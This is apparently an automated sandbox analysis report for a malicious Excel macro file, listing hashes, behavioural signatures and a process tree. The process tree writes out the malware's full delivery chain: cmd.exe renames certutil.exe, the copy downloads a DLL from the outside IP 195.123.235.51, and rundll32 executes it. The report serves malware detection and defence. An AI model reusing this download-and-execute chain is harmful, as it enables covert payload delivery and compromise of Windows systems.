cancel_sub_VCP1234567890123.xlsb

General
Target

cancel_sub_VCP1234567890123.xlsb

Filesize

123KB

Completed

10-06-2021 19:17

Score
10 /10
MD5

9e1ee4a42c381eabcf2cde38a1aae7c9

SHA1

015bb306d9e54001d433b3ac2e7212b864f54ae2

SHA256

fd71a2fcc0b5dd0fb0dbff257839b67749f2cadf30e2d3dae7f0e941d93d24d3

Malware Config
Signatures 7

Filter: none

Discovery
  • Process spawned unexpected child process
    cmd.execmd.exe

    Description

    This typically indicates the parent process was compromised via an exploit or macro.

    Reported IOCs

    descriptionpidpid_targetprocesstarget process
    Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process42684440cmd.exeEXCEL.EXE
    Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process18644440cmd.exeEXCEL.EXE
  • Executes dropped EXE
    TTObk2.exe

    Reported IOCs

    pidprocess
    692TTObk2.exe
  • Checks processor information in registry
    EXCEL.EXE

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key opened\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0EXCEL.EXE
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHzEXCEL.EXE
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameStringEXCEL.EXE
  • Enumerates system info in registry
    EXCEL.EXE

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKUEXCEL.EXE
    Key opened\REGISTRY\MACHINE\Hardware\Description\System\BIOSEXCEL.EXE
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamilyEXCEL.EXE
  • Suspicious behavior: AddClipboardFormatListener
    EXCEL.EXE

    Reported IOCs

    pidprocess
    4440EXCEL.EXE
  • Suspicious use of SetWindowsHookEx
    EXCEL.EXE

    Reported IOCs

    pidprocess
    4440EXCEL.EXE
    4440EXCEL.EXE
    4440EXCEL.EXE
    4440EXCEL.EXE
    4440EXCEL.EXE
    4440EXCEL.EXE
    4440EXCEL.EXE
    4440EXCEL.EXE
    4440EXCEL.EXE
    4440EXCEL.EXE
    4440EXCEL.EXE
    4440EXCEL.EXE
    4440EXCEL.EXE
    4440EXCEL.EXE
  • Suspicious use of WriteProcessMemory
    EXCEL.EXEcmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 4440 wrote to memory of 42684440EXCEL.EXEcmd.exe
    PID 4440 wrote to memory of 42684440EXCEL.EXEcmd.exe
    PID 4440 wrote to memory of 6924440EXCEL.EXETTObk2.exe
    PID 4440 wrote to memory of 6924440EXCEL.EXETTObk2.exe
    PID 4440 wrote to memory of 18644440EXCEL.EXEcmd.exe
    PID 4440 wrote to memory of 18644440EXCEL.EXEcmd.exe
    PID 1864 wrote to memory of 21281864cmd.exerundll32.exe
    PID 1864 wrote to memory of 21281864cmd.exerundll32.exe
Processes 5
  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\cancel_sub_VCP1234567890123.xlsb"
    Checks processor information in registry
    Enumerates system info in registry
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:4440
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir %programdata%\TTObk2 && copy /b %SystemRoot%\System32\certutil.exe %programdata%\TTObk2\TTObk2.exe
      Process spawned unexpected child process
      PID:4268
    • C:\programdata\TTObk2\TTObk2.exe
      "C:\programdata\TTObk2\TTObk2.exe" -urlcache -f -split http://195.123.235.51 c:\programdata\TTObk2\TTObk2.dll
      Executes dropped EXE
      PID:692
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c rundll32 %programdata%\TTObk2\TTObk2.dll,StartW
      Process spawned unexpected child process
      Suspicious use of WriteProcessMemory
      PID:1864
      • C:\Windows\system32\rundll32.exe
        rundll32 C:\ProgramData\TTObk2\TTObk2.dll,StartW
        PID:2128
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
          Execution
            Exfiltration
              Impact
                Initial Access
                  Lateral Movement
                    Persistence
                      Privilege Escalation
                        Replay Monitor
                        00:00 00:00
                        Downloads
                        • C:\ProgramData\TTObk2\TTObk2.dll

                          MD5

                          336d5ebc5436534e61d16e63ddfca327

                          SHA1

                          3bc15c8aae3e4124dd409035f32ea2fd6835efc9

                          SHA256

                          3973e022e93220f9212c18d0d0c543ae7c309e46640da93a4a0314de999f5112

                          SHA512

                          7c0b0d99a6e4c33cda0f6f63547f878f4dd9f486dfe5d0446ce004b1c0ff28f191ff86f5d5933d3614cceee6fbbdc17e658881d3a164dfa5d6f4c699b2126e3d

                        • C:\ProgramData\TTObk2\TTObk2.exe

                          MD5

                          056c7d065f4622da9cc2848f47e2bae2

                          SHA1

                          6c6f18b0ec53dc63488961c4240ec584ac71c25f

                          SHA256

                          e09a2d7ecac1a10c89e27750a18790da06ddd7311965dbc9ab6096f636dae61c

                          SHA512

                          db158c9b669a2668149caf30df32595a488dcc831d7518ca2e793eac0885492a2eaee838914e706a585b7f3f1c801e299c697b2cec509204561bb098e16253d5

                        • C:\programdata\TTObk2\TTObk2.exe

                          MD5

                          056c7d065f4622da9cc2848f47e2bae2

                          SHA1

                          6c6f18b0ec53dc63488961c4240ec584ac71c25f

                          SHA256

                          e09a2d7ecac1a10c89e27750a18790da06ddd7311965dbc9ab6096f636dae61c

                          SHA512

                          db158c9b669a2668149caf30df32595a488dcc831d7518ca2e793eac0885492a2eaee838914e706a585b7f3f1c801e299c697b2cec509204561bb098e16253d5

                        • memory/692-181-0x0000000000000000-mapping.dmp

                        • memory/1864-183-0x0000000000000000-mapping.dmp

                        • memory/2128-184-0x0000000000000000-mapping.dmp

                        • memory/4268-179-0x0000000000000000-mapping.dmp

                        • memory/4440-123-0x00007FF9D3020000-0x00007FF9D4F15000-memory.dmp

                        • memory/4440-122-0x00007FF9D4F20000-0x00007FF9D600E000-memory.dmp

                        • memory/4440-121-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp

                        • memory/4440-118-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp

                        • memory/4440-117-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp

                        • memory/4440-116-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp

                        • memory/4440-115-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp

                        • memory/4440-114-0x00007FF66AA70000-0x00007FF66E026000-memory.dmp